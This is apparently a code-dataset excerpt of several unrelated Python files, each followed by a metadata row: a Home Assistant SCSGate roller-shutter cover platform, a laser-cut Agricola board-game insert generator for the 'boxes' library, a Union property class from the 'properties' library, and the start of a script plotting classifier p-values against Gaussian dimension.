from homeassistant.components.cover import (CoverDevice, PLATFORM_SCHEMA)
from homeassistant.const import (CONF_DEVICES, CONF_NAME)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES):
cv.schema_with_slug_keys(scsgate.SCSGATE_SCHEMA),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the SCSGate cover."""
devices = config.get(CONF_DEVICES)
covers = []
logger = logging.getLogger(__name__)
if devices:
for _, entity_info in devices.items():
if entity_info[scsgate.CONF_SCS_ID] in scsgate.SCSGATE.devices:
continue
name = entity_info[CONF_NAME]
scs_id = entity_info[scsgate.CONF_SCS_ID]
logger.info("Adding %s scsgate.cover", name)
cover = SCSGateCover(name=name, scs_id=scs_id, logger=logger)
scsgate.SCSGATE.add_device(cover)
covers.append(cover)
add_entities(covers)
class SCSGateCover(CoverDevice):
"""Representation of SCSGate cover."""
def __init__(self, scs_id, name, logger):
"""Initialize the cover."""
self._scs_id = scs_id
self._name = name
self._logger = logger
@property
def scs_id(self):
"""Return the SCSGate ID."""
return self._scs_id
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def is_closed(self):
"""Return if the cover is closed."""
return None
def open_cover(self, **kwargs):
"""Move the cover."""
from scsgate.tasks import RaiseRollerShutterTask
scsgate.SCSGATE.append_task(
RaiseRollerShutterTask(target=self._scs_id))
def close_cover(self, **kwargs):
"""Move the cover down."""
from scsgate.tasks import LowerRollerShutterTask
scsgate.SCSGATE.append_task(
LowerRollerShutterTask(target=self._scs_id))
def stop_cover(self, **kwargs):
"""Stop the cover."""
from scsgate.tasks import HaltRollerShutterTask
scsgate.SCSGATE.append_task(HaltRollerShutterTask(target=self._scs_id))
def process_event(self, message):
"""Handle a SCSGate message related with this cover."""
self._logger.debug("Cover %s, got message %s",
self._scs_id, message.toggled)
| apache-2.0 | 3,655,453,133,303,029,000 | 27.765957 | 79 | 0.628328 | false | 3.719395 | false | false | false |
florianfesti/boxes | boxes/generators/agricolainsert.py | 1 | 30390 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Guillaume Collic
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math
from functools import partial
from boxes import Boxes, edges
from .dividertray import (
SlotDescriptionsGenerator,
DividerSlotsEdge,
)
class AgricolaInsert(Boxes):
"""
Agricola Revised Edition game box insert, including some expansions.
"""
ui_group = "Misc"
description = """
This insert was designed with 3 mm plywood in mind, and should work fine with
materials around this thickness.
This is an insert for the [Agricola Revised Edition](https://boardgamegeek.com/boardgame/200680/agricola-revised-edition)
board game. It is specifically designed around the [Farmers Of The Moor expansion](https://boardgamegeek.com/boardgameexpansion/257344/agricola-farmers-moor),
and should also store the [5-6 players expansion](https://boardgamegeek.com/boardgameexpansion/210625/agricola-expansion-5-and-6-players)
(not tested, but I tried to take everything into account for it, please inform
us if you tested it).
It can be stored inside the original game box, including the 2 expansions,
with the lid slightly raised.
The parts of a given element are mostly generated next to each other vertically.
It should be straightforward to match them.
Here are the different elements, from left to right in the generated file.
#### Card tray
The cards are all kept in a tray, with paper dividers to sort them easily. When
the tray is not full of cards, wood dividers slides in slots in order to keep
the cards from falling into the empty space.
There should be enough space for the main game, Farmers Of The Moor, and the 5-6
player expansion, but not much more than that.
To keep a lower profile, the cards are at a slight angle, and the paper dividers
tabs are horizontal instead of vertical.
A small wall keeps the card against one side while the tabs protrude on the
other side, above the small wall.
The wall with the big hole is the sloped one. It goes between the two
"comb-like" walls first, with its two small holes at the bottom. Then there is a
low-height long wall with a sloped edge which should go from the sloped wall to
the other side. You can finish the tray with the last wall at the end.
#### Upper level trays
4 trays with movable walls are used to store resources. They were designed to
store them in this order:
* Stone / Vegetable / Pig / Cow
* Reed / Grain / Sheep
* Wood / Clay
* Food / Fire
The wall would probably be better if fixed instead of movable, but I would like
to test with the 5-6 player expansion to be sure their positions are correct
with it too.
The little feet of the movable wall should be glued. The triangles are put
horizontally, with their bases towards the sides.
#### Lower level tray
The lower level tray is used to store the horses.
#### Room/Field tiles
Two boxes are generated to store the room/field tiles. One for the wood/field,
the other for the clay/stone. They are stored with the main opening upside, but
I prefer to use them during play with this face on the side.
#### Moor/Forest and miscellaneous tiles
A box is generated to store the Moor/Forest tiles, and some other tiles such as
the "multiple resources" cardboard tokens.
The Moor/Forest tiles are at the same height as the Room/Field, and the upper
level trays are directly on them. The horse box and player box are slightly
lower. This Moor/Forest box have a lowered corner (the one for the miscellaneous
tiles). Two cardboard pieces can be stored between the smaller boxes and the
upper level trays (as seen on the picture).
Be sure to match the pieces so that the walls with smaller heights are next to
each other.
#### Players bit boxes
Each player has its own box where the bits of his color are stored.
The cardboard bed from Farmers Of The Moor is central to this box.
* The fences are stored inside the bed
* The bed is placed in the box, with holes to keep it there (and to take less
height)
* The stables are stored in the two corners
* The five farmers are stored between the bed and the three walls, alternatively
head up and head down.
During assembly, the small bars are put in the middle holes. The two bigger
holes at the ends are used for the bed feet. The bar keeps the bed from
protruding underneath.
"""
def __init__(self):
Boxes.__init__(self)
self.addSettingsArgs(edges.FingerJointSettings, surroundingspaces=1.0)
def render(self):
player_box_height = 34.5
player_box_inner_width = 50.5
bigger_box_inner_height = 36.7
row_width = 37.2
tray_inner_height = 17
box_width = 218
card_tray_height = (
self.thickness * 2 + tray_inner_height + bigger_box_inner_height
)
card_tray_width = (
305.35 - player_box_inner_width * 2 - row_width * 2 - 9 * self.thickness
)
self.render_card_divider_tray(card_tray_height, box_width, card_tray_width)
self.render_upper_token_trays(tray_inner_height, box_width)
wood_room_box_width = 39.8
self.render_room_box(wood_room_box_width, bigger_box_inner_height, row_width)
stone_room_box_width = 26.7
self.render_room_box(stone_room_box_width, bigger_box_inner_height, row_width)
moor_box_length = 84.6
self.render_moor_box(
bigger_box_inner_height, player_box_height, row_width, moor_box_length
)
horse_box_margin = 0.5
horse_box_length = (
box_width
- wood_room_box_width
- stone_room_box_width
- moor_box_length
- 6 * self.thickness
- horse_box_margin
)
self.render_horse_box(player_box_height, row_width, horse_box_length)
for _ in range(6):
self.render_player_box(player_box_height, player_box_inner_width)
def render_card_divider_tray(
self, card_tray_height, card_tray_length, card_tray_width
):
"""
The whole tray which contains the cards, including its dividers.
Cards are at an angle, to save height.
"""
self.ctx.save()
tray_inner_length = card_tray_length - self.thickness
margin_for_score_sheet = 0 # 3 if you want more space for score sheet
sleeved_cards_width = 62 + margin_for_score_sheet
rad = math.acos(card_tray_height / sleeved_cards_width)
angle = math.degrees(rad)
cos = math.cos(rad)
tan = math.tan(rad)
sin = math.sin(rad)
slots_number = 19
slot_depth = 30
slot_descriptions = SlotDescriptionsGenerator().generate_all_same_angles(
[tray_inner_length / slots_number for _ in range(slots_number)],
self.thickness,
0.2,
slot_depth,
card_tray_height,
angle,
)
slot_descriptions.adjust_to_target_length(tray_inner_length)
sloped_wall_height = sleeved_cards_width - self.thickness * (tan + 1 / tan)
sloped_wall_posx_at_y0 = (
tray_inner_length - sloped_wall_height * tan - cos * self.thickness
)
sloped_wall_posx = sloped_wall_posx_at_y0 + cos * self.thickness / 2
sloped_wall_posy = sin * self.thickness / 2
dse = DividerSlotsEdge(self, slot_descriptions.descriptions)
for _ in range(2):
self.rectangularWall(
tray_inner_length,
card_tray_height,
["e", "e", dse, "f"],
move="up",
callback=[
partial(
lambda: self.fingerHolesAt(
sloped_wall_posx,
sloped_wall_posy,
sloped_wall_height,
angle=90 - angle,
)
)
],
)
# generate spacer
spacer_height = card_tray_height / 2
spacer_spacing = card_tray_width-99.8
spacer_upper_width = sloped_wall_posx_at_y0 + spacer_height * tan
self.trapezoidWall(
spacer_height,
spacer_upper_width,
sloped_wall_posx_at_y0,
"fefe",
move="up rotated",
)
self.rectangularWall(
card_tray_width,
card_tray_height,
"eFeF",
move="up",
callback=[
partial(
lambda: self.fingerHolesAt(
spacer_spacing - self.thickness / 2, 0, spacer_height
)
)
],
)
self.rectangularWall(
card_tray_width,
sloped_wall_height,
"efef",
move="up",
callback=[
partial(
self.generate_card_tray_sloped_wall_holes,
card_tray_width,
sloped_wall_height,
spacer_height,
spacer_spacing,
rad,
)
],
)
self.ctx.restore()
self.rectangularWall(card_tray_length, 0, "FFFF", move="right only")
self.ctx.save()
divider_height = sleeved_cards_width - self.thickness * tan
self.generate_divider(
card_tray_width, divider_height, slot_depth, spacer_spacing, "up"
)
self.explain(
[
"Wood divider",
"Hard separation to keep the card",
"from slipping in empty space left.",
"Takes more space, but won't move.",
"Duplicate as much as you want",
"(I use 2).",
]
)
self.ctx.restore()
self.rectangularWall(card_tray_width, 0, "ffff", move="right only")
self.ctx.save()
self.generate_paper_divider(
card_tray_width, sleeved_cards_width, slot_depth, spacer_spacing, "up"
)
self.explain(
[
"Paper divider",
"Soft separation to search easily",
"the card group you need",
"(by expansion, number of player,",
"etc.).",
"Duplicate as much as you want",
"(I use 7).",
]
)
self.ctx.restore()
self.rectangularWall(card_tray_width, 0, "ffff", move="right only")
def explain(self, strings):
self.text(
str.join(
"\n",
strings,
),
fontsize=7,
align="bottom left",
)
def generate_sloped_wall_holes(self, side_wall_length, rad, sloped_wall_height):
cos = math.cos(rad)
tan = math.tan(rad)
sin = math.sin(rad)
posx_at_y0 = side_wall_length - sloped_wall_height * tan
posx = posx_at_y0 - cos * self.thickness / 2
posy = sin * self.thickness / 2
self.fingerHolesAt(posx, posy, sloped_wall_height, angle=90 - math.degrees(rad))
def generate_card_tray_sloped_wall_holes(
self, side_wall_length, sloped_wall_height, spacer_height, spacer_spacing, rad
):
# Spacer finger holes
self.fingerHolesAt(
side_wall_length - (spacer_spacing - self.thickness / 2),
# the sloped wall doesn't exactly touch the bottom of the spacer
-self.thickness * math.tan(rad),
spacer_height / math.cos(rad),
)
# Big hole to access "lost" space behind sloped wall
radius = 5
padding = 8
total_loss = 2 * radius + 2 * padding
self.moveTo(radius + padding, padding)
self.polyline(
side_wall_length - total_loss,
(90, radius),
sloped_wall_height - total_loss,
(90, radius),
side_wall_length - total_loss,
(90, radius),
sloped_wall_height - total_loss,
(90, radius),
)
def generate_paper_divider(self, width, height, slot_depth, spacer_spacing, move):
"""
A card separation made of paper, which moves freely in the card tray.
Takes less space and easy to manipulate, but won't block cards in place.
"""
if self.move(width, height, move, True):
return
margin = 0.5
actual_width = width - margin
self.polyline(
actual_width - spacer_spacing,
90,
height - slot_depth,
-90,
spacer_spacing,
90,
slot_depth,
90,
actual_width,
90,
height,
90,
)
# Move for next piece
self.move(width, height, move)
def generate_divider(self, width, height, slot_depth, spacer_spacing, move):
"""
A card separation made of wood which slides in the side slots.
Can be useful to do hard separations, but takes more space and
less movable than the paper ones.
"""
total_width = width + 2 * self.thickness
if self.move(total_width, height, move, True):
return
radius = 16
padding = 20
divider_notch_depth = 35
self.polyline(
self.thickness + spacer_spacing + padding - radius,
(90, radius),
divider_notch_depth - radius - radius,
(-90, radius),
width - 2 * radius - 2 * padding - spacer_spacing,
(-90, radius),
divider_notch_depth - radius - radius,
(90, radius),
self.thickness + padding - radius,
90,
slot_depth,
90,
self.thickness,
-90,
height - slot_depth,
90,
width - spacer_spacing,
90,
height - slot_depth,
-90,
self.thickness + spacer_spacing,
90,
slot_depth,
)
# Move for next piece
self.move(total_width, height, move)
def render_horse_box(self, player_box_height, row_width, width):
"""
Box for the horses on lower level. Same height as player boxes.
"""
length = 2 * row_width + 3 * self.thickness
self.render_simple_tray(width, length, player_box_height)
def render_moor_box(
self, bigger_box_inner_height, player_box_height, row_width, length
):
"""
Box for the moor/forest tiles, and the cardboard tokens with multiple
units of resources.
A corner is lowered (the one for the tokens) at the same height as player boxes
to store 2 levels of small boards there.
"""
self.ctx.save()
height = bigger_box_inner_height
lowered_height = player_box_height - self.thickness
lowered_corner_height = height - lowered_height
corner_length = 53.5
self.rectangularWall(
length,
2 * row_width + self.thickness,
"FfFf",
move="up",
callback=[
partial(
lambda: self.fingerHolesAt(
0, row_width + 0.5 * self.thickness, length, 0
)
)
],
)
for i in range(2):
self.rectangularWall(
length,
lowered_height,
[
"f",
"f",
MoorBoxSideEdge(
self, corner_length, lowered_corner_height, i % 2 == 0
),
"f",
],
move="up",
)
self.rectangularWall(length, height / 2, "ffef", move="up")
for i in range(2):
self.rectangularWall(
2 * row_width + self.thickness,
lowered_height,
[
"F",
"F",
MoorBoxHoleEdge(self, height, lowered_corner_height, i % 2 == 0),
"F",
],
move="up",
callback=[
partial(self.generate_side_finger_holes, row_width, height / 2)
],
)
self.ctx.restore()
self.rectangularWall(length, 0, "FFFF", move="right only")
def generate_side_finger_holes(self, row_width, height):
self.fingerHolesAt(row_width + 0.5 * self.thickness, 0, height)
def render_room_box(self, width, height, row_width):
"""
A box in which storing room/field tiles.
"""
border_height = 12
room_box_length = row_width * 2 + self.thickness
self.ctx.save()
self.rectangularWall(
room_box_length,
height,
"eFfF",
move="up",
callback=[partial(self.generate_side_finger_holes, row_width, height)],
)
self.rectangularWall(
room_box_length,
width,
"FFfF",
move="up",
callback=[partial(self.generate_side_finger_holes, row_width, width)],
)
self.rectangularWall(
room_box_length,
border_height,
"FFeF",
move="up",
callback=[
partial(self.generate_side_finger_holes, row_width, border_height)
],
)
for _ in range(3):
self.trapezoidWall(width, height, border_height, "ffef", move="up")
self.ctx.restore()
self.rectangularWall(room_box_length, 0, "FFFF", move="right only")
def render_player_box(self, player_box_height, player_box_inner_width):
"""
A box in which storing all the bits of a single player,
including (and designed for) the cardboard bed from Farmers Of The Moor.
"""
self.ctx.save()
bed_inner_height = player_box_height - self.thickness
bed_inner_length = 66.75
bed_inner_width = player_box_inner_width
cardboard_bed_foot_height = 6.5
cardboard_bed_hole_margin = 5
cardboard_bed_hole_length = 12
bed_head_length = 20
bed_foot_height = 18
support_length = 38
bed_edge = Bed2SidesEdge(
self, bed_inner_length, bed_head_length, bed_foot_height
)
noop_edge = NoopEdge(self)
self.ctx.save()
optim_180_x = (
bed_inner_length + self.thickness + bed_head_length + 2 * self.spacing
)
optim_180_y = 2 * bed_foot_height - player_box_height + 2 * self.spacing
for _ in range(2):
self.rectangularWall(
bed_inner_length,
bed_inner_height,
["F", bed_edge, noop_edge, "F"],
move="up",
)
self.moveTo(optim_180_x, optim_180_y, -180)
self.ctx.restore()
self.moveTo(0, bed_inner_height + self.thickness + self.spacing + optim_180_y)
self.rectangularWall(
bed_inner_length,
bed_inner_width,
"feff",
move="up",
callback=[
partial(
self.generate_bed_holes,
bed_inner_width,
cardboard_bed_hole_margin,
cardboard_bed_hole_length,
support_length,
)
],
)
self.ctx.save()
self.rectangularWall(
bed_inner_width,
bed_inner_height,
["F", "f", BedHeadEdge(self, bed_inner_height - 15), "f"],
move="right",
)
for _ in range(2):
self.rectangularWall(
cardboard_bed_foot_height - self.thickness,
support_length,
"efee",
move="right",
)
self.ctx.restore()
self.rectangularWall(
bed_inner_width,
bed_inner_height,
"Ffef",
move="up only",
)
self.ctx.restore()
self.rectangularWall(
bed_inner_length + bed_head_length + self.spacing - self.thickness,
0,
"FFFF",
move="right only",
)
def generate_bed_holes(self, width, margin, hole_length, support_length):
support_start = margin + hole_length
bed_width = 29.5
bed_space_to_wall = (width - bed_width) / 2
bed_feet_width = 3
posy_1 = bed_space_to_wall
posy_2 = width - bed_space_to_wall
for y, direction in [(posy_1, 1), (posy_2, -1)]:
bed_feet_middle_y = y + direction * bed_feet_width / 2
support_middle_y = y + direction * self.thickness / 2
self.rectangularHole(
margin,
bed_feet_middle_y,
hole_length,
bed_feet_width,
center_x=False,
)
self.fingerHolesAt(support_start, support_middle_y, support_length, angle=0)
self.rectangularHole(
support_start + support_length,
bed_feet_middle_y,
hole_length,
bed_feet_width,
center_x=False,
)
def render_upper_token_trays(self, tray_inner_height, box_width):
"""
Upper level : multiple trays for each ressource
(beside horses which are on the lower level)
"""
tray_height = tray_inner_height + self.thickness
upper_level_width = 196
upper_level_length = box_width
row_width = upper_level_width / 3
# Stone / Vegetable / Pig / Cow
self.render_simple_tray(row_width, upper_level_length, tray_height, 3)
# Reed / Grain / Sheep
self.render_simple_tray(row_width, upper_level_length * 2 / 3, tray_height, 2)
# Wood / Clay
self.render_simple_tray(row_width, upper_level_length * 2 / 3, tray_height, 1)
# Food / Fire
self.render_simple_tray(upper_level_length / 3, row_width * 2, tray_height, 1)
def render_simple_tray(self, outer_width, outer_length, outer_height, dividers=0):
"""
One of the upper level trays, with movable dividers.
"""
width = outer_width - 2 * self.thickness
length = outer_length - 2 * self.thickness
height = outer_height - self.thickness
self.ctx.save()
self.rectangularWall(width, length, "FFFF", move="up")
for _ in range(2):
self.rectangularWall(width, height, "ffef", move="up")
self.ctx.restore()
self.rectangularWall(width, length, "FFFF", move="right only")
for _ in range(2):
self.rectangularWall(height, length, "FfFe", move="right")
if dividers:
self.ctx.save()
for _ in range(dividers):
self.render_simple_tray_divider(width, height, "up")
self.ctx.restore()
self.render_simple_tray_divider(width, height, "right only")
def render_simple_tray_divider(self, width, height, move):
"""
Simple movable divider. A wall with small feet for a little more stability.
"""
if self.move(height, width, move, True):
return
t = self.thickness
self.polyline(
height - t,
90,
t,
-90,
t,
90,
width - 2 * t,
90,
t,
-90,
t,
90,
height - t,
90,
width,
90,
)
self.move(height, width, move)
self.render_simple_tray_divider_feet(width, height, move)
def render_simple_tray_divider_feet(self, width, height, move):
sqr2 = math.sqrt(2)
t = self.thickness
divider_foot_width = 2 * t
full_width = t + 2 * divider_foot_width
move_length = self.spacing + full_width / sqr2
move_width = self.spacing + max(full_width, height)
if self.move(move_width, move_length, move, True):
return
self.ctx.save()
self.polyline(
sqr2 * divider_foot_width,
135,
t,
-90,
t,
-90,
t,
135,
sqr2 * divider_foot_width,
135,
full_width,
135,
)
self.ctx.restore()
self.moveTo(-self.burn / sqr2, self.burn * (1 + 1 / sqr2), 45)
self.moveTo(full_width)
self.polyline(
0,
135,
sqr2 * divider_foot_width,
135,
t,
-90,
t,
-90,
t,
135,
sqr2 * divider_foot_width,
135,
)
self.move(move_width, move_length, move)
class MoorBoxSideEdge(edges.BaseEdge):
"""
Edge for the sides of the moor tiles box
"""
def __init__(self, boxes, corner_length, corner_height, lower_corner):
super(MoorBoxSideEdge, self).__init__(boxes, None)
self.corner_height = corner_height
self.lower_corner = lower_corner
self.corner_length = corner_length
def __call__(self, length, **kw):
radius = self.corner_height / 2
if self.lower_corner:
self.polyline(
length - self.corner_height - self.corner_length,
(90, radius),
0,
(-90, radius),
self.corner_length,
)
else:
self.polyline(length)
def startwidth(self):
return self.corner_height
def endwidth(self):
return 0 if self.lower_corner else self.corner_height
class MoorBoxHoleEdge(edges.BaseEdge):
"""
Edge which does the notches for the moor tiles box
"""
def __init__(self, boxes, height, corner_height, lower_corner):
super(MoorBoxHoleEdge, self).__init__(boxes, None)
self.height = height
self.corner_height = corner_height
self.lower_corner = lower_corner
def __call__(self, length, **kw):
one_side_width = (length - self.thickness) / 2
notch_width = 20
radius = 6
upper_edge = (one_side_width - notch_width - 2 * radius) / 2
hole_start = 10
lowered_hole_start = 2
hole_depth = self.height - 2 * radius
lower_edge = notch_width - 2 * radius
one_side_polyline = lambda margin1, margin2: [
upper_edge,
(90, radius),
hole_depth - margin1,
(-90, radius),
lower_edge,
(-90, radius),
hole_depth - margin2,
(90, radius),
upper_edge,
]
normal_side_polyline = one_side_polyline(hole_start, hole_start)
corner_side_polyline = one_side_polyline(
lowered_hole_start, lowered_hole_start + self.corner_height
)
full_polyline = (
normal_side_polyline
+ [0, self.thickness, 0]
+ (corner_side_polyline if self.lower_corner else normal_side_polyline)
)
self.polyline(*full_polyline)
def startwidth(self):
return self.corner_height
def endwidth(self):
return 0 if self.lower_corner else self.corner_height
class BedHeadEdge(edges.BaseEdge):
"""
Edge which does the head side of the Agricola player box
"""
def __init__(self, boxes, hole_depth):
super(BedHeadEdge, self).__init__(boxes, None)
self.hole_depth = hole_depth
def __call__(self, length, **kw):
hole_length = 16
upper_corner = 10
lower_corner = 6
depth = self.hole_depth - upper_corner - lower_corner
upper_edge = (length - hole_length - 2 * upper_corner) / 2
lower_edge = hole_length - 2 * lower_corner
self.polyline(
upper_edge,
(90, upper_corner),
depth,
(-90, lower_corner),
lower_edge,
(-90, lower_corner),
depth,
(90, upper_corner),
upper_edge,
)
class Bed2SidesEdge(edges.BaseEdge):
"""
Edge which does a bed like shape, skipping the next corner.
The next edge should be a NoopEdge
"""
def __init__(self, boxes, bed_length, full_head_length, full_foot_height):
super(Bed2SidesEdge, self).__init__(boxes, None)
self.bed_length = bed_length
self.full_head_length = full_head_length
self.full_foot_height = full_foot_height
def __call__(self, bed_height, **kw):
foot_corner = 6
middle_corner = 3
head_corner = 10
foot_height = self.full_foot_height - self.thickness - foot_corner
head_length = self.full_head_length - head_corner - self.thickness
corners = foot_corner + middle_corner + head_corner
head_height = bed_height - foot_height - corners
middle_length = self.bed_length - head_length - corners
self.polyline(
foot_height,
(90, foot_corner),
middle_length,
(-90, middle_corner),
head_height,
(90, head_corner),
head_length,
)
class NoopEdge(edges.BaseEdge):
"""
Edge which does nothing, not even turn or move.
"""
def __init__(self, boxes):
super(NoopEdge, self).__init__(boxes, None)
def __call__(self, length, **kw):
# cancel turn
self.corner(-90)
| gpl-3.0 | 6,987,736,483,937,999,000 | 31.537473 | 158 | 0.551366 | false | 3.83809 | false | false | false |
aranzgeo/properties | properties/base/union.py | 2 | 9323 | """union.py: Union property"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from warnings import warn
from six import PY2
from .base import GENERIC_ERRORS, HasProperties
from .instance import Instance
from .. import basic
from .. import utils
if PY2:
from types import ClassType #pylint: disable=no-name-in-module
CLASS_TYPES = (type, ClassType)
else:
CLASS_TYPES = (type,)
class Union(basic.Property):
"""Property with multiple valid Property types
**Union** Properties contain a list of :ref:`property` instances.
Validation, serialization, etc. cycle through the corresponding method
on the each Property instance sequentially until one succeeds. If all
Property types raise an error, the Union Property will also raise an
error.
.. note::
When specifying Property types, the order matters; if multiple
types are valid, the earlier type will be favored. For example,
.. code::
import properties
union_0 = properties.Union(
doc='String and Color',
props=(properties.String(''), properties.Color('')),
)
union_1 = properties.Union(
doc='String and Color',
props=(properties.Color(''), properties.String('')),
)
union_0.validate(None, 'red') == 'red' # Validates to string
union_1.validate(None, 'red') == (255, 0, 0) # Validates to color
**Available keywords** (in addition to those inherited from
:ref:`Property <property>`):
* **props** - A list of Property instances that each specify a valid
type for the Union Property. HasProperties classes may also be
specified; these are coerced to Instance Properties of the respective
class.
"""
class_info = 'a union of multiple property types'
def __init__(self, doc, props, **kwargs):
self.props = props
super(Union, self).__init__(doc, **kwargs)
self._unused_default_warning()
@property
def props(self):
"""List of valid property types or HasProperties classes"""
return self._props
@props.setter
def props(self, value):
if not isinstance(value, (tuple, list)):
raise TypeError('props must be a list')
new_props = tuple()
for prop in value:
if (isinstance(prop, CLASS_TYPES) and
issubclass(prop, HasProperties)):
prop = Instance('', prop)
if not isinstance(prop, basic.Property):
raise TypeError('props must be Property instances or '
'HasProperties classes')
new_props += (prop,)
self._props = new_props
@property
def strict_instances(self):
"""Require input dictionaries for instances to be valid
If True, this passes :code:`strict=True` and
:code:`assert_valid=True` to the instance
deserializer, ensuring the instance is valid.
Default is False.
"""
return getattr(self, '_strict_instances', False)
@strict_instances.setter
def strict_instances(self, value):
if not isinstance(value, bool):
raise TypeError('strict_instances must be a boolean')
self._strict_instances = value
@property
def info(self):
"""Description of the property, supplemental to the basic doc"""
return ' or '.join([p.info or 'any value' for p in self.props])
@property
def name(self):
"""The name of the property on a HasProperties class
This is set in the metaclass. For Unions, props inherit the name.
"""
return getattr(self, '_name', '')
@name.setter
def name(self, value):
for prop in self.props:
prop.name = value
self._name = value
@property
def default(self):
"""Default value of the property"""
prop_def = getattr(self, '_default', utils.undefined)
for prop in self.props:
if prop.default is utils.undefined:
continue
if prop_def is utils.undefined:
prop_def = prop.default
break
return prop_def
@default.setter
def default(self, value):
if value is utils.undefined:
self._default = value
return
for prop in self.props:
try:
if callable(value):
prop.validate(None, value())
else:
prop.validate(None, value)
self._default = value
return
except GENERIC_ERRORS:
continue
raise TypeError('Invalid default for Union property')
def _unused_default_warning(self):
prop_def = getattr(self, '_default', utils.undefined)
for prop in self.props:
if prop.default is utils.undefined:
continue
if prop_def is utils.undefined:
prop_def = prop.default
elif prop_def != prop.default:
warn('Union prop default ignored: {}'.format(prop.default),
RuntimeWarning)
def _try_prop_method(self, instance, value, method_name):
"""Helper method to perform a method on each of the union props
This method gathers all errors and returns them at the end
if the method on each of the props fails.
"""
error_messages = []
for prop in self.props:
try:
return getattr(prop, method_name)(instance, value)
except GENERIC_ERRORS as err:
if hasattr(err, 'error_tuples'):
error_messages += [
err_tup.message for err_tup in err.error_tuples
]
if error_messages:
extra = 'Possible explanation:'
for message in error_messages:
extra += '\n - {}'.format(message)
else:
extra = ''
self.error(instance, value, extra=extra)
def validate(self, instance, value):
"""Check if value is a valid type of one of the Union props"""
return self._try_prop_method(instance, value, 'validate')
def assert_valid(self, instance, value=None):
"""Check if the Union has a valid value"""
valid = super(Union, self).assert_valid(instance, value)
if not valid:
return False
if value is None:
value = instance._get(self.name)
if value is None:
return True
return self._try_prop_method(instance, value, 'assert_valid')
def serialize(self, value, **kwargs):
"""Return a serialized value
If no serializer is provided, it uses the serialize method of the
prop corresponding to the value
"""
kwargs.update({'include_class': kwargs.get('include_class', True)})
if self.serializer is not None:
return self.serializer(value, **kwargs)
if value is None:
return None
for prop in self.props:
try:
prop.validate(None, value)
except GENERIC_ERRORS:
continue
return prop.serialize(value, **kwargs)
return self.to_json(value, **kwargs)
def deserialize(self, value, **kwargs):
"""Return a deserialized value
If no deserializer is provided, it uses the deserialize method of the
prop corresponding to the value
"""
kwargs.update({'trusted': kwargs.get('trusted', False)})
if self.deserializer is not None:
return self.deserializer(value, **kwargs)
if value is None:
return None
instance_props = [
prop for prop in self.props if isinstance(prop, Instance)
]
kwargs = kwargs.copy()
kwargs.update({
'strict': kwargs.get('strict') or self.strict_instances,
'assert_valid': self.strict_instances,
})
if isinstance(value, dict) and value.get('__class__'):
clsname = value.get('__class__')
for prop in instance_props:
if clsname == prop.instance_class.__name__:
return prop.deserialize(value, **kwargs)
for prop in self.props:
try:
out_val = prop.deserialize(value, **kwargs)
prop.validate(None, out_val)
return out_val
except GENERIC_ERRORS:
continue
return self.from_json(value, **kwargs)
def equal(self, value_a, value_b):
return any((prop.equal(value_a, value_b) for prop in self.props))
@staticmethod
def to_json(value, **kwargs):
"""Return value, serialized if value is a HasProperties instance"""
if isinstance(value, HasProperties):
return value.serialize(**kwargs)
return value
def sphinx_class(self):
"""Redefine sphinx class to provide doc links to types of props"""
return ', '.join(p.sphinx_class() for p in self.props)
| mit | -3,137,872,113,707,390,500 | 34.048872 | 113 | 0.576424 | false | 4.645242 | false | false | false |
weissercn/MLTools | Dalitz_simplified/evaluation_of_optimised_classifiers/gaussian_same_projection_on_each_axis_analysis/plot_gauss_dimenionality_analysis.py | 1 | 21737 | import sys
import numpy as np
import matplotlib.pyplot as plt
import os
# Options for mode 'single_p_values','ensemble', 'ensemble_redefined', 'ensemble_redefined_noCPV', 'ensemble_redefined_optimised', 'ensemble_redefined_noCPV_optimised'
MODE= 'ensemble_redefined_noCPV_optimised'
if MODE == 'single_p_values':
dimensions=[2,3,4,5,6,7,8,9,10]
print("Gaussian same projection on each axis dimensional analysis \n")
p_bdt = []
for dim in dimensions:
temp = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_bdt_p_values')
p_bdt.append(temp)
print("Boosted decision tree : ", p_bdt)
p_svm = []
for dim in dimensions:
temp = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_svm_p_values')
p_svm.append(temp)
print("Support vector machine : ", p_svm)
p_nn = []
for dim in dimensions:
temp = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_nn_4layers_100neurons_onehot_p_values')
p_nn.append(temp)
print("Neural Network : ", p_nn)
p_miranda_2bins = []
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_2_bins_p_values")
p_miranda_2bins.append(temp)
print("Miranda 2 bins : ",p_miranda_2bins )
p_miranda_3bins = [ ]
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_3_bins_p_values")
p_miranda_3bins.append(temp)
print("Miranda 3 bins : ",p_miranda_3bins )
p_miranda_5bins = [ ]
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_5_bins_p_values")
p_miranda_5bins.append(temp)
print("Miranda 5 bins : ",p_miranda_5bins )
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_bdt,label="bdt ",color='darkorange')
ax.plot(dimensions,p_svm,label="svm ",color='lawngreen')
ax.plot(dimensions,p_nn,label="nn 4l 100n ",color='blueviolet')
